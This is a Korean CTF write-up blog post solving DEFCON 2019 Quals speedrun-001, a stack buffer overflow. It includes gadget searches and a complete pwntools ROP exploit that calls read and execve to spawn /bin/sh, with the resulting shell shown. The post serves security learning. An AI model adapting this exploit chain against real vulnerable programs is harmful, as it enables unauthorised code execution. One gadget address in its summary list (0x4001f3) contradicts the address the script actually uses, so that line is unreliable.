시작

안녕하세요 :D

얼마 전에 DEFCON 2019 예선전 문제들을 살짝 건드려봤는데요!!

..건드리기는 커녕 그냥 구경만 했지마뉴ㅠㅠㅠ

특히 삽질했던 speedrun-001번 문제를 풀어볼까 합니다.

막상 풀고보니 되게 간단해서 조금 당황스러웠습니다.. IDA만 있었어도 풀었을텐데 ㅎㅎ!!

바로 시작해보죠

Write UP

root@goorm:/tmp/DEFCON/speedrun# ./speedrun-001
Hello brave new challenger
Any last words?
nononono
This will be the last thing that you say: nononono

Alas, you had no luck today.

남길 말은 없냐고 물어본 후 입력을 받습니다.

뭔가 BOF가 일어날 것 같은 느낌적인 느낌이 드네요.

root@goorm:/tmp/DEFCON/speedrun# ./speedrun-001
Hello brave new challenger
Any last words?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
This will be the last thing that you say: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaa

세그멘테이션 오류 (core dumped)

세그멘테이션 오류!!! 역시 BOF에요 BOF

IDA로 뜯어볼까요?? ..는 없어서 따왔습니다ㅠㅠ

__int64 sub_400B60()

{

    char buf; // [rsp+0h] [rbp-400h]



    sub_410390("Any last words?");

    read(0, &buf, 2000uLL);

    return sub_40F710("This will be the last thing that you say: %s\n", &buf);

}

역시 read()에서 터지는군요.

보호 기법도 체크하고 가겠습니다.

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

NX만 똭 걸려있는걸 보니 ROP의 냄새가 솔솔 납니다 ㅎㅎㅎㅎ

간단하게 시나리오를 짜보면

１. read()로 /bin/sh 저장

２. execve()로 /bin/sh 실행

정도가 되겠네요.

syscall을 이용해서 익스플로잇 해보겠습니다.

이 친구는 rax값에 들어있는 수를 보고 함수를 호출하죠??

read()의 syscall number은 0번입니다. 인자는 아시다시피 3개죠.

execve()의 syscall number은 59번입니다. 인자는 역시 3개네요.

RTL Chain을 이용해 인자들을 넣어주려면 가젯이 필요할 것 같습니다.

32bit 에선 pppr을 이용하면 끝났지만 64bit 는 조금 다릅니다.

rdi, rsi, rdx, rcx .. 순서로 인자가 전달이 되기 때문에 가젯들을 각각 구해줘야 해요.

필요한 주소들은 다음과 같습니다.

１. pop rax ; ret :

２. pop rdi ; ret :

３. pop rsi ; ret :

４. pop rdx ; ret :

５. syscall ; ret :

６. “/bin/sh”를 저장할 .bss 주소 :

가젯들은 rp++를 이용해 구하면 됩니다!

root@goorm:/tmp/DEFCON/speedrun# rp-lin-x64 -f speedrun-001 -r 1 | grep "pop rax ; ret"
0x00415664: pop rax ; ret  ;  (1 found)

root@goorm:/tmp/DEFCON/speedrun# rp-lin-x64 -f speedrun-001 -r 1 | grep "pop rdi ; ret"
0x00400686: pop rdi ; ret  ;  (1 found)

root@goorm:/tmp/DEFCON/speedrun# rp-lin-x64 -f speedrun-001 -r 1 | grep "pop rsi ; ret"
0x004101f3: pop rsi ; ret  ;  (1 found)

root@goorm:/tmp/DEFCON/speedrun# rp-lin-x64 -f speedrun-001 -r 1 | grep "pop rdx ; ret"
0x0044be16: pop rdx ; ret  ;  (1 found)

root@goorm:/tmp/DEFCON/speedrun# rp-lin-x64 -f speedrun-001 -r 1 | grep "syscall"

0x00474e65: syscall  ; ret  ;  (1 found)

.bss 영역의 주소는 objdump로 구해요

root@goorm:/tmp/DEFCON/speedrun# objdump -x ./speedrun-001
.

.

Sections:
Idx Name          Size      VMA               LMA               File off  Algn
.

.
 24 __libc_thread_subfreeres 00000008  00000000006bb2d0  00000000006bb2d0  000bb2d0  2**3
                  CONTENTS, ALLOC, LOAD, DATA
 25 .bss          000016f8  00000000006bb2e0  00000000006bb2e0  000bb2d8  2**5
                  ALLOC
 26 __libc_freeres_ptrs 00000028  00000000006bc9d8  00000000006bc9d8  000bb2d8  2**3
                  ALLOC
 27 .comment      0000002a  0000000000000000  0000000000000000  000bb2d8  2**0
                  CONTENTS, READONLY
 28 .note.stapsdt 000014cc  0000000000000000  0000000000000000  000bb304  2**2
                  CONTENTS, READONLY
SYMBOL TABLE:
no symbols

１. pop rax ; ret : 0x415664

２. pop rdi ; ret : 0x400686

３. pop rsi ; ret : 0x4001f3

４. pop rdx ; ret : 0x44be16

５. syscall ; ret : 0x474e65

６. “/bin/sh”를 저장할 .bss 주소 : 0x6bb2e0

조각을 다 모았습니다!!

액자에 옮겨봐요

#!/usr/bin/python
#-*- coding:utf-8 -*-

from pwn import *

p = process("./speedrun-001")

#주소
pop_rax = 0x415664
pop_rdi = 0x400686
pop_rsi = 0x4101f3
pop_rdx = 0x44be16
syscall_addr = 0x474e65
bss_addr = 0x6bb2e0

payload = ""

#BUF + SFP 덮기
payload += "A" * 1032

#RAX = 0, read() 호출 후 .bss 영역에 "/bin/sh" 저장
payload += p64(pop_rax)
payload += p64(0)
payload += p64(pop_rdi)
payload += p64(0)
payload += p64(pop_rsi)
payload += p64(bss_addr)
payload += p64(pop_rdx)
payload += p64(len("/bin/sh\x00"))
payload += p64(syscall_addr)

#RAX = 59, execve() 호출, get shell
payload += p64(pop_rax)
payload += p64(59)
payload += p64(pop_rdi)
payload += p64(bss_addr)
payload += p64(pop_rsi)
payload += p64(0)
payload += p64(pop_rdx)
payload += p64(0)
payload += p64(syscall_addr)

p.readuntil("words?\n")
p.send(payload)
p.send("/bin/sh\x00")

p.interactive()

hahaha.py를 짰습니다. 주소 잘못 옮겨적어서 한참 삽질했네요 ㅎㅎㅎㅎㅎ

root@goorm:/tmp/DEFCON/speedrun# ./hahaha.py
[+] Starting local process './speedrun-001': pid 1709
[*] Switching to interactive mode
This will be the last thing that you say: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdVA
$ whoami
root

Exploit!!

마무리

대회에서 처음 접했던 포너블 문제를 어찌어찌 풀게 되었네요.

64bit ROP를 조금만 더 빨리 공부했더라면 풀 수 있었을텐데.. 아쉽습니다 ㅠㅠ

그래도 기분은 좋네요!! ㅎㅎ 삽질한 만큼 보람이 있는 것 같습니다.

speedrun 시리즈를 계속 풀어보려구 해요!! 다음 시간에 뵙겠습니다 :D

'CTF_Write_UP' 카테고리의 다른 글

[2017 CSAW CTF] pilot (0)	2019.05.30
[Codegate 2018] BaskinRobins31 (0)	2019.05.27
[2019 DefCon Quals] speedrun-002 (0)	2019.05.25
[Plaid CTF 2013 - ropasaurusrex] rop 공룡 (0)	2019.05.15
BOF : FTZ-무임승차 문제 분석 (0)	2019.04.13

보안 초보의 성장일지

[2019 DefCon Quals] speedrun-001

시작

Write UP

마무리

'CTF_Write_UP' 카테고리의 다른 글

티스토리툴바

[2019 DefCon Quals] speedrun-001

시작

Write UP

마무리

'CTF_Write_UP' 카테고리의 다른 글

'CTF_Write_UP' Related Articles

티스토리툴바